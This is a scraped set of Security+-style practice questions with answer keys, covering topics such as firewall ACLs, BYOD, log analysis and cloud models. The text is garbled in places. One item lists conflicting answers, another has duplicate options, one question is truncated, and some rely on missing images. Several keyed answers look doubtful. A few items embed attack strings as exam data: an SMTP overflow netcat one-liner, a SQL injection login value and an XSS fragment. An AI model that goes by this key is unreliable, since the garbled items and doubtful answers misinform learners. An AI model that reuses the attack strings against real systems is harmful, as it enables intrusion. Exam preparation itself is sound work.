The computer has not reported status in 30 days.Given this scenario, which of the following statements BEST represents the issue with the output above?

A: The computer in question has not pulled the latest ACL policies for the firewall.
B: The computer in question has not pulled the latest GPO policies from the management server.
C: The computer in question has not pulled the latest antivirus definitions from the antivirus program.
D: The computer in question has not pulled the latest application software updates.

A

D

97
Q
  1. A company stores highly sensitive data files used by the accounting system on a server file share. The accounting system uses a service account named accounting-svc to access the file share. The data is protected will a full disk encryption, and the permissions are set as follows:

File system permissions: Users = Read Only

Share permission: accounting-svc = Read Only

Given the listed protections are in place and unchanged, to which of the following risks is the data still subject?

A: Exploitation of local console access and removal of data
B: Theft of physical hard drives and a breach of confidentiality
C: Remote exfiltration of data using domain credentials
D: Disclosure of sensitive data to third parties due to excessive share permissions

A

A

98
Q
  1. Confidential emails from an organization were posted to a website without the organization’s knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select TWO)
A: Secure IMAP
B: DNSSEC
C: S/MIME
D: SMTPS
E: HTTPS
A

C&D

99
Q
  1. Due to regulatory requirements, server in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization?

A: The server should connect to external Stratum 0 NTP servers for synchronization.
B: The server should connect to internal Stratum 0 NTP servers for synchronization.
C: The server should connect to external Stratum 1 NTP servers for synchronization.
D: The server should connect to external Stratum 1 NTP servers for synchronization.

A

B

100
Q
  1. A user suspects someone has been accessing a home network without permission by spoofing the MAC address of an authorized system. While attempting to determine if an unauthorized user is logging into the home network, the user reviews the wireless router, which shows the following table for systems that are currently on the home network:

Hostname IP Address MAC MAC Filter

DadPC 192.168.1.15 00:1D:1A:44:17:B5 On

MomPC 192.168.1.15 21:13:D6:C5:42:A2 Off

JuniorPC 192.168.2.16 42:A7:D1:25:11:52 On

Unknown 192.168.1.18 10:B3:22:1A:FF:21 Off

Which of the following should be the NEXT step to determine if there is an unauthorized user on the network?

A: Apply MAC filtering and see if the router drops any of the systems
B: Physically check each of the authorized systems to determine if they are logged onto the network
C: Deny the “unknown” host because the hostname is not known and MAC filtering is not applied to this host
D: Conduct a ping sweep of each of the authorized systems and see if an echo response is received

A

B

101
Q
  1. Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. Users’ email contacts are complaining of an increase in spam and social networking requests. Due to the large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken FIRST? (Select TWO)

A: Disable the compromised accounts
B: Update WAF rules to block social networks
C: Remove the compromised accounts with all AD groups
D: Change the compromised accounts’ passwords
E: Disable the open relay on the email server
F: Enable sender policy framework

A

E&F

102
Q
  1. While on a business trip, a user’s mobile device goes missing. The user immediately contacts the organization’s service desk to report the incident. Which of the following actions is the best response to protect the data stored on the user’s mobile device.

A: Encrypt all of the data on the device
B: Remotely wipe the mobile device via the mobile device manager to ensure the data is not compromised.
C: Report the device as lost or stolen to the authorities
D: Call the help desk to change your password

A

B

103
Q
  1. A security analyst is checking the bash command history on a Linux host that was involved in a data breach. The data breach stemmed from the Linux host running a series of commands against a web server on the internal network, which exploited a vulnerability in an unpatched Apache module. Given this scenario, which of

the following commands might the analyst find in the bash command history for banner grabbing? (Select THREE)

A. Arp
B. Tracert
C. NMAP
D. Net Cat (NC) 
E. Telnet
F. Grep
G. Nslookup
H. Netstat
A

C,D,&E

104
Q
  1. A company’s new policy allows employees to connect to corporate email using BYOD. Since employees handle client information in their corporate email, which of the following should the company implement with BYOD? (Select TWO)

A: Enabling rooting of the devices
B: Assign passwords and PINs to the devices
C: Disable remote wipe
D: Enable full-device encryption
E: Disable the devices ability to connect to open networks
F: Allow third-party app stores

A

B&D

105
Q
  1. Finance dept employees are reporting slow network connectivity and SSL/TLS certificate errors when they access secure websites. A security administrator suspects a computer in the finance VLAN may have been compromised and is impersonating the routers IP address using an MiTM attack. Which of the following commands should the security administrator use to verify this finding?
A. ARP
B. ROUTE
C. TRACERT 
D. NMAP
E. NSLOOKUP
A

A

106
Q
  1. A security analyst is attempting to solve compatibility issues between the company’s ERP software and application whitelisting controls. The organization uses application whitelisting to ensure only tested and approved applications are able to run within the organization. In the current configuration, only executables installed in C:\program files\ are able to be executed by the user. The following information is logged by the ERP software :

ERP Corp application v1.2

Date: 1/22/2017 5:00 AM

Running scheduled task process data\1

Copying file c:\program files\ERPCorp\processdata.exe to C:\temp\processdata-1-22-2017-0500.exe

Error: could not execute C:\temp\processdata-1-22-2017-0500.exe – Access Denied

Fault in application 0x00f4bc01 – shutting down

A: Create a path rule that permits C:\temp\processdata-1-22-2017-0500.exe to be executed
B: Create a hash rule that permits the application process data.exe to be executed
C: Create a path rule that permits C:\temp*.exe to be executed
D: Create a rule that allows all software digitally signed by ERP Corp to be executed
E: Contact the software’s publisher and request a patch be made to change the behavior of the software

A

A

107
Q
  1. Which of the following is the BEST choice for a security control that represents a preventive and corrective logical control at the same time?

A: Security awareness training
B: Antivirus
C: Firewalls
D: Intrusion detection system

A

B

108
Q
  1. As part of a new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this?

A: Require the use of an eight-character PIN.
B: Implement containerization of company data.
C: Require annual AUP sign-off.
D: Use geofencing tools to unlock devices while on the premises.

A

B

109
Q
  1. A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet:
    c: \nslookup -querytype=MX comptia.org

Server: Unknown

Address: 198.51.100.45

comptia.org MX preference=10, mail exchanger = 92.68.102.33 comptia.org MX preference=20, mail exchanger = exchg1.comptia.org exchg1.comptia.org internet address = 192.168.102.67

Which of the following should the penetration tester conclude about the command output?

A: The public/private views on the Comptia.org DNS servers are misconfigured.
B: Comptia.org is running an older mail server, which may be vulnerable to exploits.
C: The DNS SPF records have not been updated for Comptia.org.
D: 192.168.102.67 is a backup mail server that may be more vulnerable to attack.

A

A

110
Q
  1. A company is deploying smartphones for its mobile salesforce. These devices are for personal and business use but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application’s data is encrypted at rest, and the application’s connection to the back office system is considered secure. The Chief Information Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of the devices and the planned controls. Which of the following will be the MOST efficient security control to implement to lower this risk?

A: Implement a mobile data loss agent on the devices to prevent any user manipulation with the contact information.
B: Restrict screen capture features on the devices when using the custom application and the contact information.
C: Restrict contact information storage data flow so it is only shared with the customer application.
D: Require complex passwords for authentication when accessing the contact information.

A

C

111
Q
  1. The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?

A: Cloud-based antivirus solution, running as local admin, with push technology for definition updates.
B: Implementation of an off-site datacenter hosting all company data, as well as deployment of VDI for all client computing needs.
C: Host-based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs.
D: Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed.

A

D

112
Q
  1. During a routine vulnerability assessment, the following command was successful:

echo “vrfy ‘perl -e ‘print “hi” x 500 ‘ ‘ “ | nc www.company.com 25

Which of the following vulnerabilities is being exploited?

A: Buffer overflow directed at a specific host MTA
B: SQL injection directed at a web server
C: Cross-site scripting directed at www.company.com
D: Race condition in a UNIX shell script

A

A

113
Q
  1. A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-level executives found their identities were compromised, and they were victims of a recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO).
A: Implement a reverse proxy.
B: Implement an email DLP.
C: Implement a spam filter.
D: Implement a host-based firewall.
E: Implement a HIDS.
A

B&C

114
Q
  1. A security analyst has received the following alert snippet from the HIDS appliance:

PROT SIG SRC.PORT DST.PORT

TCP XMAS SCAN 192.168.1.1:1091 192.168.1.2:8891
TCP XMAS SCAN 192.168.1.1:649 192.168.1.2:9001
TCP XMAS SCAN 192.168.1.1:2264 192.168.1.2:6455
TCP XMAS SCAN 192.168.1.1:3464 192.168.1.2:8744

Given the above logs, which of the following is the cause of the attack?

A: The TCP ports on destination are all open.
B: FIN, URG, and PSH flags are set in the packet header.
C: TCP MSS is configured improperly.
D: There is improper Layer 2 segmentation.

A

B

115
Q
  1. A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices?

A: Install a corporately monitored mobile antivirus on the devices.
B: Prevent the installation of applications from a third-party application store.
C: Build a custom ROM that can prevent jailbreaking.
D: Require applications to be digitally signed.

A

B

116
Q
  1. A hacker has a packet capture that contains:

….Joe Smith………E289F21CD33E4F57890DDEA5CF267ED2.. …Jane.Doe………..AD1FAB10D33E4F57890DDEA5CF267ED2.. ….John.Key……….3374E9E7E33E4F57890DDEA5CF267ED2..

Which of the following tools will the hacker use against this type of capture?

A: Password cracker
B: Vulnerability scanner
C: DLP scanner
D: Fuzzer

A

A

117
Q
  1. An attacker exploited a vulnerability on a mail server using the code below.

” + “URL:” +”document.location) ; />

A

C

118
Q
  1. A security analyst is securing smartphones and laptops for a highly mobile workforce. Priorities include:
  • Remote wipe capabilities
  • Geolocation services
  • Patch management and reporting
  • Mandatory screen locks
  • Ability to require passcodes and pins
  • Ability to require encryption

Which of the following would BEST meet these requirements?

A: Implementing MDM software
B: Deploying relevant group policies to the devices
C: Installing full device encryption
D: Removing administrative rights to the devices

A

A

119
Q
  1. While trying to manage a firewall’s ACL, a security administrator (User3) receives an “Access Denied” error. The manager reviews the following information.

Security_admins: User1, User2

Firewall Access
       ACL Read: Security_admins 
       ACL Write: Security_admins 
       Reboot: Managers
       Audit: User3

Which of the following is preventing the administrator from accessing the firewall?

A: Rule based access control
B: Mandatory access control
C: Discretionary access’s control
D: RBAC

A

D

120
Q
  1. A systems administrator is reviewing the following access log:

[insert photo]

Based on the information in the above log, which of the following account management practices is the company MOST likely implementing?

A: Least privilege
B: Location based policies
C: Shared accounts
D: Account expiration

A

C

121
Q
  1. A network technician is trying to set up a secure method for managing users & groups across the Enterprise. Which of the following protocols is MOST likely to be used?

A. LDAPS
B. SFTP
C. NTLM
D. SNMPV3

A

A

122
Q
  1. The payroll department has contacted the security team regarding an anomaly with amounts paid via the

weekly payroll file. The security analyst

is provided the following log from the server.

Time Source File Path Action

1/1/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created
1/1/16 3:15:23 172.14.89.156 C:\ACH\payrolll.xls File transferred
1/7/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created
1/7/16 3:15:23 172.14.89.12 C:\ACH\payrolll.xls File transferred
1/14/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created
1/14/16 9:51:34 10.10.24.156 C:\ACH\payrolll.xls File modified
1/14/16 3:10:29 172.14.89.12 C:\ACH\payrolll.xls Transfer failed
1/14/15 4:10:52 172.14.89.12 C:\ACH\payrolll.xls File transferred
1/21/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created
1/21/16 3:24:01 172.14.89.12 C:\ACH\payrolll.xls File transferred
1/28/16 9:45:23 10.10.24.156 C:\ACH\payrolll.xls File created
1/28/16 9:45:23 10.10.24.156 C:\ACH\payrolll.xls File modified
1/28/16 10:23:52 17.23.45.29 C:\ACH\payrolll.xls File modified
1/28/16 3:22:15 172.14.89.12 C:\ACH\payrolll.xls File transferred

Which of the following is the most likely reason for anomaly?

A: The file was corrupted in transit
B: The file transferred to the wrong destination
C: The connection was refused by the destination
D: The file was compromised before being sent

A

D

123
Q
  1. A security analyst reviews the following log entry:

2017-01-13 1622CST 10.11.24.18 93242 148 TCP_HIT 200.200.0.223 OBSERVED POST HTTP/1.1.0 “Mozilla 1.0” www.dropbox.com Financial_Report_2016_CONFID.pdf, 13MB, MS-RTC LM8; .NET
CRL 3.0.4509.1392, Jane.Doe

Which of the following security issues can the analyst identify?

A: Data exfiltration
B: Access violation
C: Social engineering
D: Unencrypted credentials

A

A

124
Q
  1. A security administrator is performing a test to determine if a server is vulnerable to compromise through unnecessary ports. Which of the following tools would assist the security administrator in gathering the required information? (Select TWO)
A: tcpdump 
B: netcat
C: nslookup 
D: nmap
E: dig
A

B&D

125
Q
  1. A company has just adopted the BYOD deployment methodology. The company is unsure how to address the new trend and has requested assistance from a consultant. Given this scenario, which of the following should the consultant recommend? (Select TWO).
A: Use password-enabled lock screen
B: Implement an MDM solution.
C: Configure time-of-day restrictions.
D: Disable personal emails.
E: Implement application whitelisting
F: Deny access to the corporate portal.
A

A&B

126
Q
  1. A network administration receives a support ticket from the security operations team to implement secure access to the domain. The ticket contains the following information:
Source : 129.168.1.137
Destination: 10.133.10.8
Protocol TCP
Ports: 636 
Time-of-day-restriction: None 
Proxy bypass required: Yes

Which of the following is being requested to be implemented?

A: DNSSEC
B: S/MIME
C: LDAPS
D: RDP

A

C

127
Q
  1. A security consultant wants to see what information can be obtained by banner grabbing the company’s web server. There are more than 100 web servers, and the consultant would like to preform and aggregate the information quickly. Which of the following is the MOST time-efficient way to accomplish this task?

A: Use nc to establish a connection to each web server.
B: Run tcpdump on each web server in the organization
C: Use dig to run results for each web server address.
D: Run neststat on each server in the organization
E: Use ssh to connect to port 80 on each web server.

A

A

128
Q
  1. Joe a member of a sales team, recently logged into the company server after midnight local time to download the daily lead forms before his co-worker did. Management has asked the security team to provide a method for detecting this type of behavior without impeding the access for sales employees as they travel overseas. Which of the following would be the BEST method to achieve this objective?

A: Configure time-of-day restriction for the sales staff.
B: Install DLP software on the devices used by sales employees.
C: Implement a filter on the mail gateway that prevents the lead form from being emailed.
D: Create an automated alert on the SIEM for anomalous sales team activity.

A

D

129
Q
  1. Users are able to reach the login page of their company website from home using HTTP. A network administrator disables HTTP and implements SSL. However, after the implementation, home users cannot access the login page of the company website. Which of the following is the MOST likely reason the site is unavailable?

A: The users’ browsers are not equipped for SSL.
B: The company website implements HTTP redirects.
C: The company firewall is blocking port 443 traffic.
D: The company web server is using an expired certificate.

A

C

130
Q
  1. An in-house penetration tester has been asked to evade a new DLP system. The tester plans to exfiltrate data through steganography Directory of which of the following would help catch the tester in the act?

A: Abnormally high numbers of outgoing instant messages that contain obfuscated text
B: Large-capacity USB drives on the tester’s desk with encrypted zip files
C: Outgoing emails containing usually large image files
D: Unusual SFTP Connections to a consumer IP address

A

C

131
Q
  1. A technician receives a device with the following anomalies:

Frequent pop-up adsShow response-time switching between active programs Unresponsive peripherals

The technician reviews the following log file entries:

File Name Source MD5 Status Target MD5

antivirus. exe F794F21CD33E4F57890DDEA5CF267ED2 F794F21CD33E4F57890DDEA5CF267ED2 Automatic
iexplore. exe 7FAAF21CD33E4F57890DDEA5CF29CCEA AA87F21CD33E4F57890DDEAEE2197333 Automatic
service. exe 77FF390CD33E4F57890DDEA5CF28881F 77FF390CD33E4F57890DDEA5CF28881F Manual

USB.exe E289F21CD33E4F57890DDEA5CF28EDC0 E289F21CD33E4F57890DDEA5CF28EDC0 Stopped

Based on the above output, which of the following should be reviewed?

A: The web application firewall
B: The file integrity check
C: The data execution prevention
D: The removable media control

A

B

132
Q
  1. An engineer is working with the CISIRT to investigate a recent breach of client data due to improper use of cloud based tools. The engineer finds that an employee was able to access a cloud-based storage platform from the office and upload data for the purposes of doing work from home after hours. Such activity is prohibited by policy, but no preventative control is in place to block such activities. Which of the following controls would have prevented this breach?

A: Network-based IPS
B: Host-based DLP
C: Host-based IDS
D: NAC using TACACS+

A

B

133
Q
  1. Logs from IDS alerted on a string entered into the company’s website login page. The following line was pulled from the HTTP POST request:
    userid=bob’ and 1=’1&request=Submit
Which of the following was attempted?
A: Reflected XSS
B: Stored XSS
C: Cross-site request forgery
D: SQL injection
A

D

134
Q
50. A company that processes sensitive information has implemented a BYOD policy and an MDM solution to secure sensitive data that is processed by corporate and personally owned devices. Which of the following should the company implement to prevent system data from being stored on mobile devices?
A: VDI
B: Storage segmentation
C: Containerization
D: USB OTG
E: Geofencing
A

A

135
Q
51. A security analyst wants to limit the use of USB and external drives to protect against malware, as well as protect files leaving a user's computer. Which of the following is the BEST method to use?
A: Firewall
B: Router
C: Antivirus software 
D: Data loss prevention
A

D

136
Q
  1. An employee workstation with an IP address of 204.211.38.211/24 reports it is unable to submit print jobs to a network printer at 204.211.38.52/24 after a firewall upgrade. The active firewall rules are as follows:

IP Address Prot Port# Action

  1. 211.38.1/24 ALL ALL Permit
  2. 211.38.211/24 ALL ALL Permit
  3. 211.38.52/24 UDP 631 Permit
  4. 211.38.52/24 TCP 25 Deny

A: The permit statement for 204.211.38.52/24 should be changed to TCP port 631 instead of UDP.
B: The deny statement for 204.211.38.52/24 should be changed to a permit statement.
C: The permit statement for 204.211.38.52/24 should be changed to UDP port 443 instead of 631.
D: The permit statement for 204.211.38.211/54 should be changed to TCP port 631 only instead of ALL

A

A

137
Q
  1. Some of the legacy systems in an organization are running old versions of the Windows OS and others are running Linux OSs, while new systems are running the latest release of the Windows OS. The systems are not running any legacy custom applications. The organization’s Chief Information Officer (CIO) wished to unify all systems to reduce cost and enhance the security posture of the organization, without losing data or causing data leakage. Which of the following would be the BEST course of action to take?
    A: Reconfigure all existing machines to have the latest release of Windows OS.
    B: Restore all machines to default configurations.
    C: Upgrade part of the legacy systems’ infrastructure and perform OS updates.
    D: Treat all legacy systems as end-of-life systems and replace them
A

D

138
Q
54. An organization has had problems keeping track of new devices being placed on the network. which of the following tools should be used to identify where devices reside on the network?
A. Tcpdump 
B. Nslookup 
C. Nmap
D. Tracert
A

C

139
Q
55. A Chief Information Security Officer (CISO) is concerned about insider threats compromising credentials related to service accounts on internal servers. A security analyst is tasked with developing a solution that will allow for the collection and analysis of log data in a simulated environment, which represents the production environment. Which of the following solutions would BEST satisfy the CISO's requirements?
A: Bastion host
B: Evil twin
C: Honeynet
D: Vampire tap
E: Script kiddie
A

C

140
Q
  1. During a recent audit, several undocumented and unpatched devices were discovered on the internal network: Which of the following can be done to prevent similar occurrences?
    A: Run weekly vulnerability scans and remediate any missing patches on all company devices.
    B: Implement rogue system detection and configure automated alerts for new devices.
    C: Install DLP controls and prevent the use of USB drives on devices.
    D: Configure WAPs to use NAC and refuse connections that do not pass the health check.
A

B

141
Q
57. A security analyst receives a mobile device with symptoms of a virus infection. The virus is morphing whenever it is moved from sandbox to sandbox to analyze. Which of the following will help to identify the number of variations through the analysis life cycle?
A: Journaling
B: Hashing utilities
C: Log viewers
D: OS and process analysis
E: IOC tagging
A

B

142
Q
  1. A security administrator is receiving the following firewall configuration after receiving reports that users are unable to connect to remote websites:
    10 PERMIT FROM:ANY TO:ANY PORT:80
    20 PERMIT FROM:ANY TO:ANY PORT:443
    30 DENY FROM:ANY TO:ANY PORT:ANY

Which of the following is the MOST secure solution the security administrator can implement to fix this issue?
A: Add the following rule to the firewall. 5 PERMIT FROM:ANY TO:ANY PORT: 53

B: Replace rule number 10 with the following rule. 10 PERMIT FROM:ANY TO:ANY PORT: 22

C: Insert the following rule in the firewall. 25 PERMIT FROM:ANY TO:ANY PORTS:ANY D.

D: Remove the following rule from the firewall: 30 DENY FROM:ANY TO:ANY PORT:ANY

A

D

143
Q
  1. An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?
    A: Use a protocol analyzer to reconstruct the data and implement a web-proxy.
    B: Deploy a web-proxy and then blacklist the IP on the firewall.
    C: Deploy a web-proxy and implement IPS at the network edge.
    D: Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.
A

D

144
Q
60. Finance department employees are reporting slow network connectivity and SSL/TLS certificate errors when they access administrator suspects a computer in the finance VLAN may have been compromised and is impersonating the routers IP address using an MITM attack. Which of the following commands should the security administrator use to verify this finding?
A: arp
B: route 
C: tracert 
D: nmap
E: nslookup
A

A

145
Q
  1. A security administrator wants to implement antispoofing on the company’s gateway firewall to prevent an external attacker from impersonating internal IP addresses. The firewall is configured as follows:
    External interface name: e0/0
    External interface IP: 192.68.100.2/23
    Internal interface name: e1/0
    Internal interface IP: 10.100.0.1/24
    Corporate network IP apace: 10.0.0.0/8
    Internet—e0/0: 192.68.100.2/23–Firewall–e1/0: 10.100.0.1/24–Corporate Net

Which of the following ACLs should be configured on the firewall to BEST prevent spoofing?
A: FROM e0/0 TO e1/O: DENY FROM 10.0.0.0/8 to 0.0.0.0/0 08
B: FROM e0/0 TO e1/0: DENY FROM 10.0.0.0/8 to 10.100.0.1/24
C: FROM e0/0 TO e1/O: DENY FROM 0.0.0.0/0 to 10.100.0.0/24
D: FROM e0/0 TO e1/O: DENY FROM 10.100.0.1/24 to 192.68.100.2/23
E: FROM e0/0 TO e1/O: DENY FROM 192.68.100.0/23 to 10.0.0.0/24

A

D

146
Q
  1. After an employee reported slow network speeds and application responsiveness, the help desk asked the company’s security administrator to review the following firewall logs from the employee’s computer:

Which of the following can the security administrator infer and report to the help desk based on the above logs?
A: The employee’s computer is being actively scanned.
B: The employee’s computer is infected with a worm.
C: The employee’s computer firewall should be enabled.
D: The company’s router is actively listening to unneeded services.

A

A

147
Q
  1. A security administrator wants to prevent standard users from running software they downloaded or copied to the computer. The security administrator finds the following permissions on the computer:

[insert photo]

The administrator needs to create a policy that specifies from which folders a low-privilege user can run applications. Which of the following application whitelist configurations would BEST accomplish this task?
A: Allow*
Block: C:\TEMP, C:\ShippingDATA, C:\Users\User1
B: Allow: C:\, C:\OperatingSystem, C:\Programs, C:\Users\User1 Block C:\TEMP, C;\ShippingDATA, C:\Users\User1
C: Allow: C:\
Block: C: \ User\User1
D: Allow C:\OperatingSystem\, C:\Programs
Block *

A

D

148
Q
64. An active/passive configuration has an impact on:
A: confidentiality 
B: integrity
C: availability
D: non-repudiation
A

C

149
Q
65. Due to a configuration error, sales and marketing staff were able to access highly sensitive, commercial R&D information for a period of five days before the issue was discovered by an automated system, corrected, and flagged for review. Inspection of logs and monitoring systems by security analysts indicated that no sensitive data was accessed. Based on this scenario, which of the following should a risk manager be MOST concerned about?
A: Data exfiltration
B: Insider threat
C: Permission issues 
D: Baseline deviation
A

C

150
Q
3.1 Which of the following could help detect trespassers in a secure facility? (Select TWO)
A: Faraday cages
B: Motion-detection sensors
C: Tall, chain-link fencing
D: Security guards
E: Smart cards
A

B&D

151
Q
3.2 An organization recently moved its custom web applications to the cloud, and it is obtaining managed services of the back-end environment as part of its subscription. Which of the following types of services is this company now using?
A: SaaS 
B: CASB 
C: IaaS 
D: PaaS
A

D

152
Q
3.3 A company is evaluating cloud providers to reduce the cost of its internal IT operations. The company's aging systems are unable to keep up with customer demand. Which of the following cloud models will the company MOST likely select?
A: PaaS 
B: SaaS 
C: IaaS 
D: BaaS
A

C

153
Q
3.4 Which of the following BEST describes an important security advantage yielded by implementing vendor diversity?
A: Sustainability 
B: Homogeneity 
C: Resiliency
D: Configurability
A

C

154
Q

3.5 A vice president at a manufacturing organization is concerned about desktops being connected to the network. Employees need to log onto the desktops’ local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this?
A: Put the desktops in the DMZ.
B: Create a separate VLAN for the desktops.
C: Air gap the desktops.
D: Join the desktops to an ad-hoc network.

A

C

155
Q
3.6 A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now?
A: Agile
B: Waterfall 
C: Scrum 
D: Spiral
A

B

156
Q
3.7 After attempting to harden a web server, a security analyst needs to determine if an application remains vulnerable to SQL injection attacks. Which of the following would BEST assist the analyst in making this determination?
A: tracert 
B: Fuzzer 
C: nslookup 
D: Nmap
E: netcat
A

B

157
Q
3.8 Upon entering an incorrect password, the logon screen displays a message informing the user that the password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices?
A: Input validation
B: Error handling
C: Obfuscation
D: Data exposure
A

B

158
Q
3.9 Which of the following BEST describes an important security advantage yielded by implementing vendor diversity?
A: Sustainability 
B: Homogeneity 
C: Resiliency
D: Configurability
A

C

159
Q

3.10 A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the case?
A: The certificate has expired
B: The browser does not support SSL
C: The user’s account is locked out
D: The VPN software has reached the seat license maximum

A

A

160
Q
3.11 Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application?
A: Sandboxing 
B: Encryption 
C: Code signing 
D: Fuzzing
A

A

161
Q
3.12 A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the following settings should the network administrator implement to accomplish this?
A: Configure the OS default TTL to 1
B: Use NAT on the R&D network
C: Implement a router ACL
D: Enable protected ports on the switch
A

A

162
Q
3.13 A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFI- enabled baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor? 
A: Outdated antivirus 
B: WiFi signal strength 
C: Social engineering 
D: Default configuration
A

D

163
Q

3.14 A software developer is concerned about DLL hijacking in an application being written. Which of the following is the MOST viable mitigation measure of this type of attack?
A: The DLL of each application should be set individually
B: All calls to different DLLs should be hard-coded in the application
C: Access to DLLs from the Windows registry should be disabled
D: The affected DLLs should be renamed to avoid future hijacking

A

C

164
Q
3.15 A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel?
A: Tunnel mode IPSec
B: Transport mode VPN IPSec
C: L2TP
D: SSL VPN
A

B

165
Q
3.16 An application was recently compromised after some malformed data came in via web form. Which of the following would MOST likely have prevented this?
A: Input validation
B: Proxy server
C: Stress testing
D: Encoding
A

A

166
Q
3.17 An audit reported has identifies a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability?
A: Faraday cage
B: Air gap
C: Mantrap
D: Bollards
A

C

167
Q
3.18 Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications?
A: Staging environment
B: Sandboxing
C: Secure baseline
D: Trusted OS
A

B

168
Q
3.19 Which of the following locations contain the MOST volatile data?
A: SSD
B: Paging file
C: RAM
D: Cache memory
A

D

169
Q
3.20 Every morning, a systems administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement?
A: Role-based access control
B: Honeypot
C: Rule-based access control
D: Password cracker
A

B